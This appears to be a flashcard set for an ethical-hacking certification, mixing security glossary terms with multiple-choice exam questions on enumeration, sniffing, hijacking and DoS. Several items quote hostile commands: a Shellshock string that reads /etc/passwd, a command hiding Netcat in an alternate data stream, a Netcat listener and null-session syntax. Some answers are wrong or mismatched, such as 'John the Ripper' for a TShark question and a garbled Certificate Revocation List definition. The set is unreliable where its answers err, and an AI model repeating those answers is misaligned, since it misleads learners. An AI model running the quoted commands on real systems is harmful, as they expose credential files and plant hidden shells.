The overall responsibility and management of risk within an organization. Risk management is the responsibility and dissemination of roles, responsibilities, and accountabilities for risk in an organization.
Enterprise vulnerability management
The overall responsibility and management of vulnerabilities within an organization and how that management of vulnerabilities will be achieved through dissemination of duties throughout the IT organization.
Vulnerability management
The overall responsibility and management of vulnerabilities within an organization and how that management of vulnerabilities will be achieved through dissemination of duties throughout the IT organization.
Hardware
The physical equipment of a computer system, including the central processing unit, data storage devices, terminals, and printers.
Governance
The planning, influencing, and conducting of the policy and affairs of an organization.
Clipping level
The point at which an alarm threshold or trigger occurs.
Recovery point objective (RPO)
The point in time to which data must be restored to resume processing transactions. RPO is the basis on which a data protection strategy is developed.
Operation system (OS) identification
The practice of identifying the operating system of a networked device through either passive or active techniques.
Dumpster diving
The practice of rummaging through the trash of a potential target or victim to gain useful information.
Dumpster diving
The practice of rummaging through the trash of potential target or victim to gain useful information
Social engineering
The practice of tricking employees into revealing sensitive data about their computer system or infrastructure. This type of attack targets people and is the art of human manipulation. Even when systems are physically well protected, social engineering attacks are possible.
Social engineering
The practice of tricking employees into revealing sensitive data about their computer system or infrastructure; targets people and is the art of human manipulation
social engineering
The practice of tricking people into revealing sensitive data about their computer system or infrastructure. This type of attack targets people and is the art of human manipulation. Even when systems are physically well protected, social engineering attacks are possible.
Verification
The process of confirming that data is correct and accurate before it is processed or entered.
Decryption
The process of converting encrypted content into its original form, often the process of converting cipher text to plain text. Decryption is the opposite of encryption.
Site survey
The process of determining the optimum placement of wireless access points. The objective of the site survey is to create an accurate wireless system design/ layout and budgetary quote.
War driving
The process of driving around a neighborhood or area to identify wireless access points.
Dynamic host configuration protocol (DHCP)
The process of dynamically assigning an IP address to a host device.
Authorization
The process of granting or denying access to a network resource based on the user's credentials.
denial of service (DoS)
The process of having network resources, services, and bandwidth reduced or eliminated because of unwanted or malicious traffic. The goal of a DoS attack is to render the network or system nonfunctional. Some examples include Ping of Death, SYN flood, IP spoofing, and Smurf attacks.
Log on
The process of identifying yourself to your computer or an online service; the initial identification procedure to gain access to a system as a legitimate user. The usual requirements are a valid username (or user ID) and password.
Defense in depth
The process of multilayered security. The layers may be administrative, technical, or logical.
Flooding
The process of overloading the network with traffic so that no legitimate traffic or activity can occur.
Contingency planning
The process of preparing to deal with calamities and noncalamitous situations before they occur so that the effects are minimized.
Prototyping
The process of quickly putting together a working model (a prototype) to test various aspects of the design, illustrate ideas or features, and gather early user feedback. Prototyping is often treated as an integral part of the development process, where it is believed to reduce project risk and cost.
port redirection
The process of redirecting one protocol from an existing port to another.
Privacy impact analysis
The process of reviewing the information held by the corporation and assessing the damage that would result if sensitive or personal information were lost, stolen, or divulged.
Tumbling
The process of rolling through various electronic serial numbers on a cell phone to attempt to find a valid set to use.
Multicast
The process of sending a computer packet to a group of recipients.
Ping sweep
The process of sending ping requests to a series of devices or to the entire range of networked devices.
Reverse engineering
The process of taking a software program apart and analyzing its workings in detail, usually to construct a new device or program that does the same thing without actually copying anything from the original.
War dialing
The process of using a software program to automatically call thousands of telephone numbers to look for any that have a modem attached.
operating system fingerprinting
The process of using some method to determine the operating system running on a host or a server.
Denial of Service (DoS)
The process off having network resources, services and bandwidth reduced or eliminated because unwanted or malicious traffic, This attack's goal is to tender the network or system nonfunctional.
Criticality
The quality, state, degree, or measurement of the highest importance.
Bandwidth
The range of frequencies, expressed in hertz (Hz), that can pass over a given transmission channel. The bandwidth determines the rate at which information can be transmitted through the circuit.
Which of the following are characteristics of the Vulnerability Assessment Report?
The report categorizes vulnerabilities based on their severity levels. The report provides details of all the possible vulnerabilities with regard to the company's security policies. wrong
Security breach or security incident
The result of a threat or vulnerability being exploited by an attacker.
Access creep
The result of employees moving from one position to another within an organization without losing the privileges of the old position but while gaining the additional access of the new position. Thus, over time, employees build up much more access than they should have.
Data security
The science and study of methods of protecting data in computer and communications systems against unauthorized disclosure, transfer, modification, or destruction, whether accidental or intentional.
Encryption
The science of turning plain text into cipher text.
Echo reply
The second part of an ICMP ping message, officially a Type 0.
Statistical sampling
The selection of sample units from a population, and the measurement and/or recording of information on these units, to obtain estimates of population characteristics.
System software
The software that controls the operations of a computer system. It is a group of programs instead of one program. The operating system controls the hardware in the computer and peripherals, manages memory and files and multitasking functions, and is the interface between applications programs and the computer.
Minimum acceptable level of risk
The stake that an organization defines for the seven areas of information security responsibility. Depending on the goals and objectives for maintaining confidentiality, integrity, and availability of the IT infrastructure and its assets, the minimum level of acceptable risk will dictate the amount of information security.
Due care
The standard of conduct taken by a reasonable and prudent person. When you see the term due care, think of the first letter of each word and remember "do correct" because due care is about the actions that you take to reduce risk and keep it at that level.
Structured query language (SQL)
The standardized relational database language for querying, manipulating, and updating information in a relational database.
Continuity
The state or quality of being continuous or unbroken, without interruption and with a succession of parts intimately united.
Independence
The state or quality of being free from subjection or the influence, control, or guidance of individuals, things, or situations. Auditors and examining officials and their respective organizations must maintain neutrality and exercise objectivity so that opinions, judgments, conclusions, and recommendations on examined allegations are impartial and are viewed as impartial by disinterested third parties.
Risk
The subjective measure of the potential for harm that can result from the action of a person or thing.
Inherent risk
The susceptibility of an audit area to error, which could be material, individual, or in combination with other errors, assuming that there are no related internal controls.
Target of engagement (TOE)
The target or assessment or pen test target
Certification
The technical review of the system or application.
Encapsulation
The technique of layering protocols in which one layer adds a header to the information from the layer above
white-box testing
The testing team goes into the testing process with a deep understanding of the application or system. Using this knowledge, the team builds test cases to exercise each path, input field, and processing routine. This term is used to refer to network security tests as well as application tests.
gray-box testing
The testing team is provided more information than in black-box testing, while not as much as in white-box testing. Gray-box testing has the advantage of being nonintrusive while maintaining the boundary between developer and tester. This term is used to refer to network security tests as well as application tests.
black-box testing
The testing team is provided with no knowledge regarding the organization's network or application. The team can use any means at its disposal to obtain information about the organization's network or application. This is also referred to as zero-knowledge testing and closed testing. This term is used to refer to network security tests as well as application tests.
Bluesnarfing
The theft of information from a wireless device through a Bluetooth connection.
Accountability
The traceability of actions performed on a system to a specific system entity or user.
Data communications
The transmission or sharing of data between computers via an electronic medium.
What do the following commands demonstrate? C:\ user2sid \ \ truck guest S-1-5-21-343818398-789336058-1343024091-501 C:\ sid2user 5 21 343818398 789336058 1343024091 500 Name is Joe Domain is Truck
The true administrator is Joe.
You are working with a pen test team that is performing enumeration. You have just seen a team member enter the following command. What does it demonstrate? C:\user2sid \ \ truck guest S-1-5-21-343818398-789336058-1343024091-501C:\ sid2user 5 21 343818398 789336058 1343024091 500 Name is Joe Domain is Truck
The true administrator is Joe.
Eavesdropping
The unauthorized capture and reading of network traffic.
Computer-aided software engineering (CASE)
The use of software tools to assist in the development and maintenance of software. Tools used in this way are known as CASE tools.
End-user computing
The use or development of information systems by the principal users of the systems' outputs or by their staffs.
Vandalism
The willful of the destruction of property.
Collision
These occur when a hashing algorithm such as MD5, creates the same value for two or more different files.
You found the following command on a compromised system: Type nc.exe > readme.txt:nc.exe What is its purpose?
This command is used to stream Netcat behind readme.txt.
You found the following command on a compromised system: Type nc.exe > readme.txt:nc.exe What is its purpose?
This command is used to stream Netcat behind readme.txt.
Inference attack
This form of attack relies on the attacker's ability to make logical connections between seemingly unrelated pieces of information.
Blackbox testing
This form of testing occurs when the tester has no knowledge of the target or its network structure.
False rejection rate (FRR)
This is a biometric device error that is considered a type error. It is a biometric system measurement that indicates the percentage of authorized individuals who are incorrectly denied access.
False acceptance rate (FAR)
This is a type II biometric device error. It is a biometric system measurement that indicates the percentage of individuals who are incorrectly granted access. This is the worst type of error that can occur because it means that unauthorized individuals have been allowed access.
End user licensing agreement (EULA)
This is the software license that software vendors create to protect and limit their liability as well as hold the purchaser liable for illegal pirating of the software application. The EULA typically has language in it that protects the software manufacturer from software bugs and flaws and limits the liability of the vendor.
Scope creep
This is the uncontrolled change in the projects scope. It causes the assessment to drift away form its original scope and result in budget and schedule overruns.
Natural threats
Threat posed by nature; for example, fire, floods, and storms.
Man-made threats
Threats caused by humans such as hacker attacks, terrorism, or destruction of property.
Editing
To review for possible errors and make final changes, if necessary, to information in a database.
Why would an attacker scan for port 445?
To scan for SMB services and verify that the system is Windows 2000 or greater
Downloading
Transferring information from one computer to another computer and storing it there.
Which of the following approaches to vulnerability assessment relies on the administrator providing baseline of system configuration and then scanning continuously without incorporating any information found at the time of scanning?
Tree-based Assessment
What is the best defense against SNMP enumeration?
Turn off SNMP.
Deadman door
Two sets of doors: It allows one person to enter the first door, then, after it is closed, the second door is allowed to open. Deadman doors are used to control access and are also known as a mantrap.
Completely connected (mesh) configuration
Type of network configuration designed so that all devices are connected to all others with many redundant interconnections between network devices.
You have just gotten an alert from your IDS. It has flagged the following string: env x='(){:;};echo exploit' bash -c 'cat /etc/passwd'. What is the attacker attempting to do?
Use the Shellshock vulnerability to display the passwd file.
Modulation
Used by modems to convert a digital computer signal into an analog telecommunications signal.
Certificate Authority (CA)
Used in the PKI infrastructure to issue certificates and report status information and certificate revocation lists.
Electronic serial number (ESN)
Used to identify a specific cell phone when it is turned on a request to join a cell network.
code review and testing
Used to identify bad programming patterns, security misconfigurations, functional bugs, and logic flaws.
Address Resolution Protocol
Used to map a known Internet Protocol (IP) address to an unknown physical address on the local network; can take the known IP address that us being passed down the stack and use it to resolve the unknown MAC address by means of a broadcast message
Integrity
Used to verify the accuracy and completeness of an item
Committed information rate (CIR)
Used when describing the data rate guaranteed by a Frame Rely data communications circuit.
Personal area network (PAN)
Used when discussing Bluetooth devices; refers to the connection that can be made with Bluetooth between these various devices.
test coverage analysis
Uses test cases that are written against the application requirements specifications.
Data owner
Usually a member of senior management of an organization who is ultimately responsible for ensuring the protection and use of the organization's data.
Digital certificate
Usually issued by trusted third parties that contains the name of a user or server, a digital signature, a public key, and other elements used in authentication and encryption. X.509 is the most common type.
What is Vulnerability Assessment?
Vulnerability assessment is an examination of the ability of a system or application, including current security procedures and controls, to withstand assault.
Wired equivalent privacy (WEP)
WEP is based on the RC4 encryption scheme. It was designed to provide the same level of security as that of a wired LAN. Because of 40-bit encryption and problems with the initialization vector, it was found to be insecure.
Which of the following is a well-known sniffing program?
Wireshark
Tools used to combine a piece of malware with a legitimate program are known as what?
Wrappers
During a pen test, you have successfully gained access to a system. You are able to gain local administrator status on one workstation and have now moved to local administrator on a second workstation. With this in mind, which of the following is true?
You have completed horizontal privilege escalation.
How does hijacking differ from sniffing?
You take over an existing session.
Sniffing on a hub is considered which of the following?
a passive attack
Which of the following matches the common padding found on the end of short Windows LanMan (LM) passwords? a. 1404EE b. EE4403 c. EEEEEE d. 1902DD
a. 1404EE
You have been asked to analyze the SOA record from a targeted company and identify how long any DNS poisoning would last. The values from the SOA record are 2003080: 172800: 900: 1209600: 3600. Which of the following describes how long DNS poisoning would last? a. 3600 b. 900 c. 1209600 d. 2003080
a. 3600
During a security assessment you are asked to help with a footprinting activity. Which of the following might be used to determine network range? a. ARIN b. DIG c. Traceroute d. Ping host
a. ARIN
Which type of testing occurs when you have no knowledge of the network? a. Black box b. Gray box c. White box d. Blind testing
a. Black box
What are the three main tenets of security? a. Confidentiality, integrity, and availability b. Authorization, authentication, and accountability c. Deter, delay, and detect d. Acquire, authenticate, and analyze
a. Confidentiality, integrity, and availability
Phishing, social engineering, and buffer overflows are all typically used at what point in the attacker's process? a. Gaining access b. Backdoors c. Covering tracks d. Port scanning
a. Gaining access
Which of the following is a tool commonly used for enumeration? a. Hyena b. John c. LCP d. IAM tool kit
a. Hyena
Which of the following is a tool commonly used for enumeration? a. Hyena b. John c. LCP d. IAM tool kit
a. Hyena
What scan is also known as a zombie scan? a. IDLE scan b. SYN scan c. FIN scan d. Stealth scan
a. IDLE scan
During a penetration test, you have been asked to use a tool that will allow you to capture network traffic and look for clear-text usernames and passwords. Which of the following is an example of a command-line packet analyzer similar to Wireshark? a. John the Ripper b. BetterCAP c. TShark d. Snort
a. John the Ripper
An ICMP type 8 is which of the following? a. Ping message b. Unreachable message c. TTL failure message d. Redirect message
a. Ping message
Which type of hacker is considered a good guy? a. White hat b. Gray hat c. Black hat d. Suicide hacker
a. White hat
Buffer overflow
an amount of memory reserved for the temporary storage of data
Certificate Revocation List (CRL)
approval, authorization, and policymaking bodies to assess a project proposal and reach a reasoned decision, as well as justify the commitment of resources to a project.
During enumeration, what port may specifically indicate a portmapper on a Linux computer? a. 110 b. 111 c. 389 d. 445
b. 111
During enumeration, what port may specifically indicate portmapper on a Linux computer? a. 110 b. 111 c. 389 d. 445
b. 111
Which of the following would be considered outside the scope of footprinting and information gathering? a. Finding physical addresses b. Attacking targets c. Identifying potential targets d. Reviewing company website
b. Attacking targets
Which of the following is a form of session hijacking that requires no knowledge of session IDs or any other information before the attack? a. Union based b. Blind c. Session layer d. Passive
b. Blind
CNAMEs are associated with which of the following? a. ARP b. DNS c. DHCP d. Google hacking
b. DNS
Which of the following is considered a nontechnical attack? a. Password sniffing b. Dumpster diving c. Password injection d. Software keylogger
b. Dumpster diving
How is ethical hacking different from hacking? a. Ethical hackers never launch exploits. b. Ethical hackers have signed written permission. c. Ethical hackers act with malice. d. Ethical hackers have verbal permission.
b. Ethical hackers have signed written permission.
6. You have been asked to gather some specific information during a penetration test. The "intitle" string is used for what activity? a. Traceroute b. Google search c. Website query d. Host scanning
b. Google search
Which type of hacker performs both ethical and unethical activities? a. White hat b. Gray hat c. Black hat d. Suicide hacker
b. Gray hat
A TCP SYN flood attack uses the three-way handshake mechanism. The attacker at system A sends a spoofed SYN packet to the victim at system B. System B responds by sending a SYN/ ACK packet to the spoofed system. System A does not reply to system B, leaving victim B hung waiting for a response. Which of the following best describes the status of victim B? a. Fully open b. Half open c. Session fully established d. Half closed
b. Half open
Which of the following is not a Trojan mitigation step? a. User education b. Manual updates c. Isolate infected systems d. Establish user practices built on policy
b. Manual updates
Which of the following are denial of service attacks typically not used for? a. Availability attacks b. Pump and dump c. Hacktivism d. Extortion via a threat of a DoS attack
b. Pump and dump
Which type of password cracking makes use of the space/time memory trade-off? a. Dictionary attack b. Rainbow table c. Rule d. Hybrid
b. Rainbow table
Which of the following laws pertains to accountability for public companies relating to financial information? a. FISMA b. SOX c. 18 U.S.C. 1029 d. 18 U.S.C. 1030 3
b. SOX
What is the purpose of the command nc -l -v -n -p 80? a. Redirect port 80 traffic b. Set up a covert channel listening on port 80 c. Act as a keylogger on port 80 d. Block port 80
b. Set up a covert channel listening on port 80
Tools used to combine a piece of malware with a legitimate program are known as what? a. Fuzzers b. Wrappers c. Compilers d. Binders
b. Wrappers
In CVSS, the ______ group represents the intrinsic characteristics of a vulnerability that are constant over time and do not depend on a user-specific environment. This metric group is the most important information in the scoring system and the only one that's mandatory to obtain a vulnerability score.
base
When would an attacker want to begin a session hijacking attack if session fixation is being used?
before authentication
Which of the following is a form of session hijacking that requires no knowledge of session IDs or any other information before the attack?
blind
Sniffing on a hub is considered which of the following? a. Port mirroring b. Spanning c. A passive attack d. An active attack
c. A passive attack
Which type of hacker is considered unethical? a. White hat b. Gray hat c. Black hat d. Brown hat
c. Black hat
Where should an ethical hacker start the information-gathering process? a. Interview with company b. Dumpster diving c. Company's website d. Interview employees
c. Company's website
How would you use ARP cache poisoning to determine malicious activity on a network? a. You cannot because it would result in a broadcast storm. b. It would allow you to flood the network with fake MAC addresses. c. If you cannot SPAN a port, you can use ARP cache poisoning to see all traffic going to all other ports on the switch. d. It bypasses DHCP snooping.
c. If you cannot SPAN a port, you can use ARP cache poisoning to see all traffic going to all other ports on the switch.
LoriotPro is used for which of the following? a. Active OS fingerprinting b. Passive OS fingerprinting c. Mapping d. Traceroute
c. Mapping
Which of the following addresses network security testing? a. NIST 800-33 b. NIST 800-42 c. NIST 800-115 d. NIST 800-30
c. NIST 800-115
If you approach a running system that you suspect may be infected, what might you do to quickly assess what is running on the system by using built-in applications? a. CurrPorts b. Fport c. Netstat -an d. TList
c. Netstat -an
What is the common Windows and Linux tool that is used for port scanning? a. Hping b. Amap c. Nmap d. SuperScan
c. Nmap
If you were going to enumerate DNS, which of the following tools could you use? a. Route print b. ARP -A c. Nslookup d. IPconfig
c. Nslookup
The four steps of the IPv6 DHCP process can be abbreviated as which of the following? a. SORA b. DOSA c. SARR d. DORA
c. SARR - DHCPv6 uses four different steps: solicit, advertise, request, and reply.
Microsoft uses various techniques to protect user account information. The second layer of security on the SAM file is known as what? a. Encoding b. Obscuring c. SYSKEY d. Salting
c. SYSKEY
What does the Nmap -sT switch do? a. UDP scan b. ICMP scan c. TCP full connect scan d. TCP ACK scan
c. TCP full connect scan
Which type of testing occurs when individuals know the entire layout of the network? a. Black box b. Gray box c. White box d. Blind testing
c. White box
How does hijacking differ from sniffing? a. You only listen in on an existing session. b. You only intercept clear-text data. c. You take over an existing session. d. You cannot initiate a new connection.
c. You take over an existing session.
You have been asked to examine a Windows 7 computer that is running poorly. You first used Netstat to examine active connections, and you now would like to examine performance via the Computer Management Console. Which of the following is the correct command to launch it?
c:\compmgmt.msc
Which of the following is not a banking malware propagation technique?
code injection
IPv6 addresses are how long? a. 2 bytes b. 4 bytes c. 64 bytes d. 128 bits
d. 128 bits
During enumeration, what port may specifically indicate a Windows computer and most likely not a Linux computer? a. 110 b. 111 c. 25 d. 445
d. 445
During enumeration, what port may specifically indicate a Windows computer? a. 110 b. 111 c. 25 d. 445
d. 445
Which form of testing occurs when insiders are not informed of the pending test? a. Black box b. Gray box c. White box d. Blind testing
d. Blind testing
Which format stores Windows passwords in a 14-character field? a. NTLMv2 b. Kerberos c. Salted d. LAN Manager
d. LAN Manager
What are the two types of reconnaissance? a. Active and proactive b. Internal and external c. Inside and outside d. Passive and active
d. Passive and active
During a footprinting exercise, you have been asked to gather information from APNIC and LACNIC. What are these examples of? a. IPv6 options b. DHCP servers c. DNS servers d. RIRs
d. RIRs
The OSSTMM is used for which of the following? a. Open social engineering testing b. Security training c. Audits d. Security assessments
d. Security assessments
Which type of hacker will carry out an attack even if the result could be a very long prison term? a. White hat b. Gray hat c. Black hat d. Suicide hacker
d. Suicide hacker
A RID of 500 is associated with what account? a. A user account b. The first user's account c. The guest account d. The administrator account
d. The administrator account
When reviewing a Windows domain, you are able to extract some account information. A RID of 500 is associated with what account? a. A user account b. The first user's account c. The guest account d. The administrator account
d. The administrator account
Modem
device used to connect a computer to an analog phone line. Modems use the process of modulation.
Which of the following can be used to exhaust DHCP addresses?
gobbler
Which of the following is not a Trojan mitigation step?
manual updates
You are trying to establish a null session to a target system. Which is the correct syntax?
net use \ IP_address IPC$ " " /u: " "
You are trying to establish a null session to a target system. Which is the correct syntax?
net use \\ IP_address\ IPC$ "" /u:""
f you approach a running system that you suspect may be infected, what might you do to quickly assess what is running on the system by using built-in applications?
netstat -an
which of the following is an example of a command to detect a NIC in promiscuous mode?
nmap --script=sniffer-detect [target IP Address/Range of IP addresses]
_______ are similar to programs such as WinZip, Rar, and Tar in that they compress the file yet are used to hide the true function of malware.
packers
one of the members of your red team would like to run Dsniff on a span of the network that is composed of hubs. Which of the following types best describes this attack?
passive sniffing
Which DoS attack technique makes use of the Direct Connect protocol?
peer-to-peer attack
Which of the following is not a client-side session hijacking technique?
session fixation
Cookie Cadger is an example of which of the following?
session hijacking tool
Which of the following techniques requires an attacker to listen to the conversation between the victim and server and capture the authentication token for later reuse?
session replay
Bypassed authentication attack
simulates identifying wireless access points and modems
Which of the following is a MAC address spoofing tool?
smac
You have been able to intercept many ICMP packets with Wireshark that are addressed to the broadcast address on your network and are shown to be from the web server. The web server is not sending this traffic, so it is being spoofed. What type of attack is the network experiencing?
smurf
Which of the following is the least vulnerable to a sniffing attack?
ssh
You would like to attempt a man-in-the-middle attack to take control of an existing session. What transport layer protocol would allow you to predict a sequence number?
tcp
During a pen test, you have access to two machines and want to capture session IDs sent from the server. The first machine has Wireshark installed and is the client. Its IP address is 192.168.123.99. The second machine is the web server and is issuing session IDs. Its IP address is 192.168.123.150. Which of the following Wireshark filters best meets your needs and gives you just the packets with session IDs issued by the web server?
tcp.srcport == 80 && ip.src == 192.168.123.150
You have been reading about several techniques to help determine whether the traffic is coming from a legitimate source that can help you track back an ongoing DDoS attack. Which of the following Wireshark display filters can help flag packets that indicate the receiver's window size is exhausted and that no buffer is available?
tcp.window_size == 0 && tcp.flags.reset != 1
Vulnerability research is ____________.
the process of discovering vulnerabilities and design flaws
Which DDoS tool uses TCP port 6667?
trinity
Which of the following is an example of a command-line packet analyzer similar to Wireshark?
tshark
CNAMES
used in Domain Name Service (DNS); record contains the aliases or nickname
You have discovered that several of your team members' computers were infected. The attack was successful because the attacker guessed or observed which websites the victims visited and infected one or more of those sites with malware. Which type of attack was executed?
watering hole attack